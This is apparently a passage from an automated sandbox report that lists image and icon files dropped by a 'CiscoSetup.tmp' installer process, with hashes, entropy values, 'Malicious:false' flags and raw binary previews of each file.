                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...0...0.....W.......tEXtSoftware.Adobe ImageReadyq.e<...vIDATx..Y.o\.u?w.3sg..E..H..D-..YV.8n. J..H.......>...C...@..M..o...H..)...]4F....%...Lq.9.>w..|3#.L...h...K....9..;.|C...%}..)a...8..8IJ.H.;o.6.W'.Y.F.L^...a@(....K.)53....3...P,.2.=.I...6....]iV.v....r.....~yk..ej6..]...._8M..R.g.......f.[.......e,.,..i.I.D-.j..J.n....r...U.\[./....U6.$o^..ZE..7@J..I....5>.[g.:..gfBs.qy0....A..........HU%RdY..t=.,6....../5..;.\.....+/x..O...h'...1...8w~..o^=......v.Vk....wc.KA.:..."....D....)..R.e......}..{..w^.....Kd..}.]?7..lJ....O<..o^..../_>.d-.<.i....`{>.O>.w`./.dF.Rt...I..Q..{[0..J..h....T....RB...;.........]o...H...s.._.......L./O.P.....WT.P.A.....@..%RM....6@{....R5....5....M.....~....I...1s.K}.$..H.}./o.=...:..th...9=w.....(.R'-l......Lx. ..iP.iCu:.`.....\nP8.".......VoS8bR.......:..-....7..L).......M.j.rlv.......~..A9..ux.T.)_.S$.....6..<g..{..7..0...+...&h.f..%..\x^.h....1....(.....u):.S.N....Z....i....?.L_..+..%...]x..o...
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12780
                                                                                                                                                                                                  Entropy (8bit):7.975972884511595
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:eS01CYt7F9/5i2XPFK02VBVDNP/RqOMGkw9j:e1th95PqjP/E1A
                                                                                                                                                                                                  MD5:1CE2626120CD6B69683255C71552896B
                                                                                                                                                                                                  SHA1:4230DF12A00E6B13CAB39EFB1C44DCBF5B656087
                                                                                                                                                                                                  SHA-256:B55ABBF6754B131C33947DCA3511D219B2AB2DC5D7E8945BF3C6A2E9FB0FEB23
                                                                                                                                                                                                  SHA-512:A197A76FB7DB9FEF68E3A49DE4C134EFB41472773F323BF4F8AB3B610174FD75C15848BB42CFC2D4240D72EFA66FF4CFFE02DDA28323279C87C7019E167F724B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.tT..7>rk.....I...R.....6D../...T@..._.A[..$rkA.D..U0......W.EI..(...^.TC.TX>...eD......>{.>g...d~k.Jf....;....G.BB.<y..#N.6.i}......#.~......G.~......s..~...5..V...N......'.=..$.........K..a{.c.........:...3.....:.L...KWu.{.._..../<.Z...n.y..../.e{.i.3.......[.O`|..h.+../........M#._....s..G.3hO....j.._&..?...s=.<._\~I/..9....W..I.....u.tq..}..7.G;....h........f.G.v.h<....c...7.0.1....d[...^.......D"1....[.ilC..=@.6.U.O0.......P.......D.t..K..}.6M._*.....6._:h.'.Ix.htP..l.N.4.........$.m.......:........+..o<.../Ly]..p.....+...y.._.........t..........7..g...D..Y..A.........n.....9.....D."j.9....>]p.ly...........N.<....IaT..N'S..'..4.Nd.ntN........;..<d;..^..:...0...m.?).....Q..X.`).......%....!...........'..'...M2M.?..D..3{_[....jdpY.tW.i.....5Wep......Jj7....IJ....g.?M..).\}Bkc]....~u...~...w......!.x..w.......;)~NL...L.;wN............\j.[.N.Dt...EB.c:.....b..
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):472
                                                                                                                                                                                                  Entropy (8bit):7.339402871750466
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/7IEzFffWxjBiqsoNKXcQjmUVQtaaHI:hI0RBiqJycQjmU6t9HI
                                                                                                                                                                                                  MD5:AE59E69F9BB8D40D28E2C195A5F131BD
                                                                                                                                                                                                  SHA1:1AC9ED0DD66CEFA5F515A8C0D51A3E26B7F2F6A9
                                                                                                                                                                                                  SHA-256:271F2C4002F0127CD049A9BEEED8474FACED3217E7BB0C6DDEB8B34F8536FA8E
                                                                                                                                                                                                  SHA-512:D69C0C2F7C190D1795A5C6455949C0B7F63D678785C170D8DB4A7D3FF88A048D954C8236E750D2F38CAD6CED9072DA7E8E3B5B384465074637D43390D9857C26
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR..............w=.....pHYs...........~.....IDATH...Q.@...:..;......C.2)@,..:.*........(.9.........0....v.~.?.....j.....g.>n...z...u..NLU...;..2.s`.|.$...4],....Y............H.......G~.`$.p..^!]dS.UT.jE.%.......T...Y..O.....S...(.O.\.}..E{..2.p...s.._..,.D.wP.....DK.v...el..|..w.~.....{`))v.. .6^..y..rm:R}.L...+..<."..r...y#D9rD.Sd.Y..D_.o~......\.....$&;.1.6.<%..*.v.-.v3.^-M$ejU.4?%.K4..Y.R..Sm..'.AW..E....>".....^=.Y.......j.d.h.....IEND.B`.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):3.5904244181066343
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:qp/EF2cJeBcktRYgD9qsSyGrnPblkbGgmo:YccB8lPbGHB
                                                                                                                                                                                                  MD5:A1C46D32AA7BCD14A8DB10005E23B885
                                                                                                                                                                                                  SHA1:8859CD29B7D6A9D645C3B09D8AFAB041D3BB7A37
                                                                                                                                                                                                  SHA-256:66DAAB72327F0E98FC3006DA7B0F957901285993388BDE25D6149464A98C9442
                                                                                                                                                                                                  SHA-512:16CC5F81EC30BC027D6C3268383463968DD9E2C0A0A3BBDA8059BF8DC6A99853ED27CD1E1BD955ACF2F98B5B0693D5A2AEDCC69261F2E06B065ED11684179AD9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...... .... .....&......... .h.......(... ...@..... ..........................@...@...@...@...@...@...@...@...@...@...@...@...@...@.........................p...0.............................................@...s...s...s...s...s...s...s...s...s...s...s...s...@.....................................p.....................................@...s...s...s...s...s...s...s...s...s...s...s...s...@..M'..M'..M'..M'..M'..nP:...w................`.............................@...s...s...s...s...s...s...s...s...s...s...s...s...@..M'..z]J.z]J.X5..M'..M'..M'..M'..z]J......................................@...s...s...s...s...s...s...s...s...s...s...s...s...@.........................nP:.M'..M'..M'...................................@...s...s...s...s...s...s...s...s...s...s...s...s...@..............................M'..M'..M'..M'...xh..........................@...s...s...s...s...s...s...s...s...s...s...s...s...@..............................cB+.M'..z]J.M'..M'...xh......................@...s...s...s...s...s...s
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 1024 x 365, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16443
                                                                                                                                                                                                  Entropy (8bit):7.760065707691873
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:lqb0tEZvDwb6EjHGVbAxe76N2Tuzy8xvyu6:lY02FP8nsUxvyu6
                                                                                                                                                                                                  MD5:E786715A35FEB88334AA7FAA35F70248
                                                                                                                                                                                                  SHA1:2BB7D79511CA0099549DAA71263909D61789B54D
                                                                                                                                                                                                  SHA-256:0D5106D9C61EC53AC64D4663204A75F5257B41E24991F1D6CCD50471CF81C341
                                                                                                                                                                                                  SHA-512:4DF4F567FB4B1184610D1884D13F75C474757641F64CA05B6333391C12B7AFA0D7889F4DB374AB54F69E262EE4B12FB89A12E037A8F2926E01ED457D233DE3F9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.......m......O......tEXtSoftware.Adobe ImageReadyq.e<..?.IDATx...r.H.(l...70.l....L..60}....VrRI.I$_..+.&.:..`kBk......^........H..G.|.*.l}.@......,.........................................................................................................................................................................................................................(.....?...i..........B..]......5._O.L/.2}R:.....}.....i.._...R.+..ez...../......?)...)...[....?..S.......x..g.x7.z...T....H...D.... .....H................ ................ .....H.....=...v./...I..4.......S..:..|..1..._.+.s.......hF....y.....!.....:..<._...).....&.P...e..;l.c... ..W.8.... .*.....1@.l.h...'V...k..IL.L.r..h......q...g];/.T.K..rw=...%?>....kM... .0....IB.yr.....;............... .....H.......... ........n._.......-....,....3..,..Q..L.J.2.._..,..2}R2....@..*....?>..*.~.X/....4...k...L/.2.+...4...._...).....(.)......y..@.@.. ......... ..b..WB....@5..W.Ym...?..)...
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):11585
                                                                                                                                                                                                  Entropy (8bit):7.961332304899258
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:uoknxnFWLkyZS1HwgrTfSTVQV1r+2HPOSm9HRNxe6S1ipOvyYh95kRwjtbul4Ljh:uo4xAoKoHuVuHPOSmdfxy1ipwN5bjtbB
                                                                                                                                                                                                  MD5:FAA694AA17D61EAC6803E15397AE2C15
                                                                                                                                                                                                  SHA1:D3FBA06AA2794D460DEF2997E84EC7CBE49A83AB
                                                                                                                                                                                                  SHA-256:9AC4F60BF1A10CD08529427AAA1C419F5C4C1412D23EE5764B9EDACC3558A980
                                                                                                                                                                                                  SHA-512:5B2586AC90E5366C236AE02181172842CFDC311495157477ACB388A50CA56B5FB1EE532B753323566937012A54027DC53DE803DB4178F6F85618ADA4B015308C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...-...-.....].6.....pHYs...#...#.x.?v.. .IDATx....UU..7bJ_..I&.:p..#.D.2...vOU...y......I.E0...LK ...T...E_.o.H^.......QG..Hy%v.=...;....wj..Ru.>g....}._R..U..s....^{.!.....F.!&..7~.ip....G.......n..$..-.PS..%..~.)..._i.%..A.....[.<.W.P..D.S.0]+...)U..A.>..F.V (Z.RS.s.i.tMy.'S\1;(.C..}...(Z.PS.s..+Pi.tY..B....;...H..h... R..w.]T\t.p."..N,.P.rDM..Q:..8...|K..........._.G..d.Dk.D...'+.E.P.2.L.7..\..1|..8~...&.0...L.a..1......s..'N.......;.O..L|}.4E.uam.1..Q(Z.c.P5&qt...........n...p~.*'O.&z........q~..A..b..,.P.2...\...QA...6.qM.'.(.)[.........z.X.B....C.l@."2..P.9*....$&...n.@..Bv....#b..W..n..9&..E.....!._Q}...R..b....G.g........w\..8.W....Wz.;.~~....2W.$.*....=..).U..TT Z..>.;....q.".hf.+.(Z.#C..B.%a...a.4Q?g*.T..l.;GD{...0..u.......r...!`.P.Y.t..A..H......h.LT...B........v)`.BH.W.P.b".X!/.p.b..;... .....hm..6.O...VD...\.......PB..............M..!...tU9.u_/..'L.....]'.A.2$.j .j..{....7..i.kaBG.6...e@M..IY..x..+V.....@..
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):29327
                                                                                                                                                                                                  Entropy (8bit):7.967732566337996
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:kfiUT6EuEADj9MKT8NYMSNQ0Ksn1GStodN2AG1:kfTGGYRKK1GStodNw
                                                                                                                                                                                                  MD5:A0FE71E2020412BD9FFEB2712628DAD0
                                                                                                                                                                                                  SHA1:33EBF21B46A1742A46DEEE2EADB0F714B4F64959
                                                                                                                                                                                                  SHA-256:3AF5729F9A5902B409FD0D79BA1B04AF2ABDB25BCB4750F235BD61DC2EEE7C77
                                                                                                                                                                                                  SHA-512:D4886F29044F3B6A1FB900AF1973362B6822085544ED65877B2F555B360E494912AAFFDA58E49C8A91ED541F9D18482A1811C9350074797416CC8ECD06CC1863
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx..]le...V...>H.mE .1.[.0#Q.6.%=..l.....ln.sC.8H#.........F..W5.-."vq1..`.:.b4..$H'-.]3.n.d.i..A.].....G..6.^{}..{=?ic...^{.w....?.cV..;B.........4[..n....r....boo..9c.9..<.(g...].{..]O....OY.b.cqq./x..9u.Uk'...R:...'.....=.G'''...t.....>..4...'...h...."...K..../7z.MOF....'....#...>.|...S.j...3g&...~..1.:.:WB.uWJ..R.dT...'!K..rF.&E...^.......Z.........A...E..........`N...s.b. Wx..)[....o'B....}.E+c6..!.._.+Z.......R.B..G..8..D....._..N.....lle........./'#....W..]...........`0......?.^....t.......g?....j..*..C......KE]..z...P..W.k....PWF..aUT=O*.+.7.]...QA..uz.c.D.IOF..w..hx.E.{pp...1Y..-`{ELN..}....7.0...._..Q.6z....MN...Y../..+...'B.W.s.:?....[.NDBr2._..;;..U(..!......I.7.....k..W_.R..j...'...A.......e.o.\.tkm._...S,....'.....].>....dL.z.\.ml...15u.....6^.6w.:.:.U..e.....A;.)...f,,,.z....{Oi9"....$.V.p....h...L.7.u.d.%...1..o..x..J...N5..;...Z...y.I..hj..&."q.O..2..-1.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5558
                                                                                                                                                                                                  Entropy (8bit):4.450533821817726
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:vcn7ngbW2IU8R9Lq+LhfSnuX31xEqxpkg:E74IU8R9LqMTFxz
                                                                                                                                                                                                  MD5:EAF0F00DA8BB1D384B8A5BB3B82D0A54
                                                                                                                                                                                                  SHA1:2E7021D20D962F4568A51757B2D9B7408624740E
                                                                                                                                                                                                  SHA-256:86D5102E01D6D29D5AEE6E87E827B8C624D7B552035C9AFDB0BE2B120E4A553F
                                                                                                                                                                                                  SHA-512:57358DEA1B8A75A8FEEE29F9D83931D65672B228B93CE6C9CFEEBA3C77FD9FDB8D7B7D4A1F3188D8CBC2FEBF8B427F574791E6210580499788FF101641C01854
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...... .... .(...&......... .h...N...(... ...@..... ........................................................................ ...`...................................................................................................................p.........................................................~...~...}...}...}....0........................................`................z]J.M'..'....hm.)...................................................................................................z]J.M'..M'..M'..M'..'...%x}.+...............................................................................................M'..M'..M'...kY..............x}.....!....................................................................................xh.M'..M'..z]J.....................8y}.4...#................................................................................xh.M'..M'..............................Az~.=...%......................................................................p........M'..M'
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8950
                                                                                                                                                                                                  Entropy (8bit):7.969730039207073
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:p96ObyGv4LCovtazAkU/bm8oT+4UObs9KhHU1gL3c2/Rqw:tbtuCovtazCDdxObJ5UM3hh
                                                                                                                                                                                                  MD5:4F8EBA018E164B7A5FFDA205576989E8
                                                                                                                                                                                                  SHA1:56669FFFC614C2577370B0EF84EA6EA4FFE89858
                                                                                                                                                                                                  SHA-256:815EACDBC62FED323EB3D0BBAD4596C0D699862A66258A4F994B78CE520389A1
                                                                                                                                                                                                  SHA-512:F9CBDEE29FD372DEA72C6039E705A192B2C751927490B811317CE74A56DBEF1B4C17D05D1CC29A32F060C6A761D93CDB5D2AF6C76853427F5341D7C6DA4F44E7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............5..6....pHYs...#...#.x.?v.. .IDATx....]E......m..Z.o....AZ.n(>V.")1.-F.....m...l...b\.@....E..|....*..'%.RA)...+.e.}.%..T6....3sf.s.s....{.;.7..7..)..i..i...~...?L.v....o.h..|..@<..vR.....ILO ...N..<'a.N......N..bs..!..<,c...}b..U]...../.L...=Enx......V.3.}r.)o.u..|...+g.Hu.*.....k..[.$&z...G#o....o.W.`w.T.5..~=..........V..;..$`.......=zf..Di_....D...r......W].}":..w|...=.._.s.2`r.8!.l.|o.......;hzy..n.s.0..+?3l>....Q5=..:6....L.<.l..x.......{.O.mx..R..i..$...\....#..^7Q.>C..........$..`.=...*...~....oc.e?._q......c}.......G.'.=....<..!X5.....=.8........N@..1c.Q.....5.A.]...)....t7B.......=.V...vn...cGNbr...s.1w...g[....e.6U..{..\...N"......0:....WirR.IL.d...JQ..9.....^/.......Gb/>...z...M-..2......(1. ..$.g..Y..'N... .-)...2...S.M.%......$;.X..R..C..m.m'.|wK...4[..`.....!..o.....,..u..4...._}.....l.O...3.mn..Y..m..M..Q.9..Y...N...!K.?.D..........!....x{d..=...T4.i.M.;.NGf...^.s.....T_&.%...7..
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1260x1024, components 3
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):399779
                                                                                                                                                                                                  Entropy (8bit):7.9639437199622165
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:NZGJOTaTKegfZjGiFfyHLyforThgWTZcWX1nQ8WMsETaVovwV:/JT6g5JyjrThgWTZvQ8lsvVnV
                                                                                                                                                                                                  MD5:DF0BDC3CDA98B3BE333FEB2A2770002C
                                                                                                                                                                                                  SHA1:D0FED726183EBEA0B535EE06A66805E7BF3C9386
                                                                                                                                                                                                  SHA-256:FD3413367D94F80DC520390C0971F9AA44003C9C6F32BCBC3303A6682D0B0175
                                                                                                                                                                                                  SHA-512:46F9DA519D7D8E1D192D9EB6082FBEAAE164EC58C97C22BB576B8DEEC387B57FFC8CF8BF75412C8FD2B30B9962B96070A679F2E26558099B5DB4411A59E0386D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:......JFIF.....H.H.....,Photoshop 3.0.8BIM.........H.......H........D.http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:xmpGImg="http://ns.adobe.com/xap/1.0/g/img/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:illustrator="http://ns.adobe.com/illustrator/1.0/". xmlns:pdf="http://ns.adobe.com/pdf/1.3/">. <dc:format>image/jpeg</dc:format>. <dc:title>. <rdf:Alt>. <rdf:li xml:lang="x-default">Ba
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):51094
                                                                                                                                                                                                  Entropy (8bit):7.977081753425093
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:UoAL5K723jk6waeSXMFYcQotAtZJqyGlOk6bAfb1:Uv5YAjkCeS8u6tAnwwTbe1
                                                                                                                                                                                                  MD5:BBD0533637DA4102A6DC250FB20D6FA7
                                                                                                                                                                                                  SHA1:B78DC64053313A61F3C25550D17C2700923B1EF0
                                                                                                                                                                                                  SHA-256:C4D28DB251B9D72B2EF84EB9774F028FFDB65E432451E79E50D51A497D8196B9
                                                                                                                                                                                                  SHA-512:A3B17D20439BE297AD034827FD5B9EC40DB2D3B597D76431F29AE4C72C2647546DAB7696A05B3007C6796862CA67F7EDD41D8826C0D41BB55139A1D58CE23C46
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR..............x......pHYs..........+.... .IDATx..wx.U...wf.{O $$..z.".J.......YEEE..." .TAd..^BM..RH.}2...dw...U.....=.;...{.....s.=...D".8.Eq....._....#......u)..X..T.....*@.......7....(...|......7...r~.U.... ..7.(.B..*.X.B.@".PCo....@...`...8...8w.r..w.. ...b...IB..9.$...H$.d.E...*_.{.>@.o.}5 .|U^....~..<.....;..@..'.P.H.. .X......u...+..:..r.......p...M.."K.I"...Dbn#......@..o.~..sv...;..p.......T!D.T.D"......_U....<.........$.C....$ ........B..T.D".....3..T)_.?.t(_..be..|g.H.Cp.H.....D:.....x....D.5...o...".............R5...H$.o.5@.P...~'.%................Z...t.$..0..@..........%...U..\......R-...H$.c..........G..I.H....o.l....L.B.K.H.. .X........'..>..Db(y.m..~......t.$..3.....[.=...s.K$.......N...(.j.H.@"1...@..7..6..*o*]I..n.?.X...BdK.H.. .......k.<.~..EjFb..?"....be.#.t.$..n...'.q@C.|.R3.+..}..U`.pR..J.. ..o..>)O...Db.....JxQ..H.. ....k.~..;...'..Hl...L.G....]&..H.@RY........r./....?....B.\...t.$.n.]...x.Y.B.V$.........B.I.H
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12258
                                                                                                                                                                                                  Entropy (8bit):7.976396258951981
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:Fkocto5a0L5W0WyUW8l4JGfcRWyryRN77YK/CPEyei5rTiKb9bdgih7OnT:Fkocto5zW0dNaAfRxKK80dbd5hanT
                                                                                                                                                                                                  MD5:33B3721B931071C69A9ECDFDAEF39F29
                                                                                                                                                                                                  SHA1:EE4DD7077CFDA9C0A2FE594CE8C9496EF23CA2E3
                                                                                                                                                                                                  SHA-256:55FC14B826D7F3C9F47F14CDBDAE488F1D4FE3678CD95BBBF7E643436F382D37
                                                                                                                                                                                                  SHA-512:B8E1843F2F08ADF93F7277FFAF8DD5299F7F5FCFA38AD15EC54422D4E3048822E15BB9D0B682D1728B6E4064CAE32222998ED48D41310FE7D9C58116D6D9E108
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.x.....Q?.....!.._..t]..$.*`W@..Z.......]..h..B.n...j/.R.~..P`..+*A..-J...o..u....9..3s...7....+y.3.<.<..%....5.....Sv.o?9p.....=..t....~./,]ID.>....O.p9.T.6.I/*.......s'O...}.....QkS].y36."..P.../f...E..Y....n.h.K.uN2..*zn.....M...Y.n?.....V(G......o6.....n.G6........O~ai...hn+....s..3...3...........X0.t..o....Gr.w...../{.l....3"..d#s..]..S^...x.7\.xtk7.k....f..8.....MMM.......At...'.t1......c}...k.....U....b]dW.=.k.=.o..a...o....v &T....-j....q.o.5=....w.2.v.&U.37F..WG...vn....l......S...g`'./.|Z....lSP.....ji...N.<..6f.u^.v..l;)F...$.....E81..F7.i..h.+.2~3.SBD..w.q/...z+.?..........^.S.(.3f..N.......km..v....#.H7..S&0J/._XZ@D...t2a.........tD..#..]"s...J....|M....?..tLH....&.8.|t.H.\/..O|C....":..E)Q.R.....<?...M.}............1..3.....]5.w+....W.>7. .j..>..,b8..c..v.E..........;.\.:];.I.S..CE...c..._...........r./e..C...t..7.yLJ..{_.z........W<E;f^g....O2..>|.n...o..7Q.d.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):4.044905068349432
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:m/CRZkMiOjTrP2GqirkNv05M36iJpx8wpeXlUA9S5Sxgo2vo:mqcaTrP1zr804FjiUA9s4g7o
                                                                                                                                                                                                  MD5:1AE447E7E6E48D922E20DACEBEABF6B7
                                                                                                                                                                                                  SHA1:405E8A92B647B62F189B88AF58F1473C53F09991
                                                                                                                                                                                                  SHA-256:40107A62ABD4DE28E722EC92905913E24873CD9E10C21CEE50698949AB76C358
                                                                                                                                                                                                  SHA-512:F703E7D8AE70589C75F722BE8D64C9D136A524ADDD3AE39D0ED94C32C632EBB2E0EECB61C08342564AE42445B4146E10CED0ED4EE783DDF3785CC6D7AA124440
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...... .... .....&......... .h.......(... ...@..... ............................................................................P........................ne....y...s...s...s...s...s...s...y.&..`...................................................P......................................y.(...0 ..0 ..0 ..0 ..0 ..0 ..(.....y.&..`.......................................@................z]J.X5..M'..M'..M'..>"E...y.(...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..(.....y.&..`.........................................xh.M'..M'..M'..M'..M'..nP:.I/T...y.(...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..(.....y.&..`...............................X5..M'..M'..nP:...................y.(...0 ..0 ..0 ..=...0 ..0 ..0 ..0 ..=...0 ..0 ..0 ..(.....y.............................M'..M'..nP:...........................s.0 ..0 ..0 ..=.......WJ..0 ..0 ..WJ......J<..0 ..0 ..0 ....s.........................M'..M'...xh...............................s.0 ..0 ..0 ..0 ..WJ......WJ..WJ......WJ..0 ..0 ..0 ..0 ....s............0.......M'..M'
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):3.612237043911612
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:SPEyydQzC5enoYfFMdIDhjdmrEEN4kbGg2o:SFS5eno4FMyADNHx
                                                                                                                                                                                                  MD5:CAE552335F760EE1FF87D686F972BEB8
                                                                                                                                                                                                  SHA1:676A5070DDD6218C274FE01608754D06E735558A
                                                                                                                                                                                                  SHA-256:615057C1B8C472DDF3D6B48284DB764F3F4FE8A159FD479B96C401D0BEE82674
                                                                                                                                                                                                  SHA-512:876B7077A8DF9C900BCF1CF8D5AF98A3B84A7D31412DEE05CAF76ACA215B771EFD5CD5E8225175E822BCE24239A57F841D1DDF633B3C68599D0C401AA98BBDF9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...... .... .....&......... .h.......(... ...@..... ..............................................................@...@...@...@...@...@...@...@...@...@...@...@...@...@...........................................................................@...s...s...s...s...s...s...s...s...s...s...s...s...@.....................................................................P.....@...s...s...s...s...s...s...s...s...s...s...s...s...@.........P.................................................................@...s...s...s...s...s...s...s...s...s...s...s...s...@......................................................................X5...@...s...s...s...s...s...s...s...s...s...s...s...s...@..X5...........................................................xh.M'..M'...@...s...s...s...s...s...s...s...s...s...s...s...s...@..M'..M'...xh..............................................xh.M'..M'.......@...s...s...s...s...s...s...s...s...s...s...s...s...@..z]J.M'..M'...xh................................P........M'..M'
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28939
                                                                                                                                                                                                  Entropy (8bit):7.960017526195935
                                                                                                                                                                                                  Encrypted:false
